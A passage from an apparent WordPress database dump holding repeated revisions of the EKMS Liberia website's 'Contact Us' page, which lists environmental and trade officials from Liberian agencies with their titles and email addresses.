<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager-CCCD Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:41:07','2021-01-22 10:41:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3417,42,'2021-01-22 11:33:27','2021-01-22 11:33:27','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager-CCCD Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:33:27','2021-01-22 11:33:27','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3418,42,'2021-01-22 11:33:28','2021-01-22 11:33:28','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager-CCCD Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:33:28','2021-01-22 11:33:28','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3419,42,'2021-01-22 11:33:28','2021-01-22 11:33:28','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br 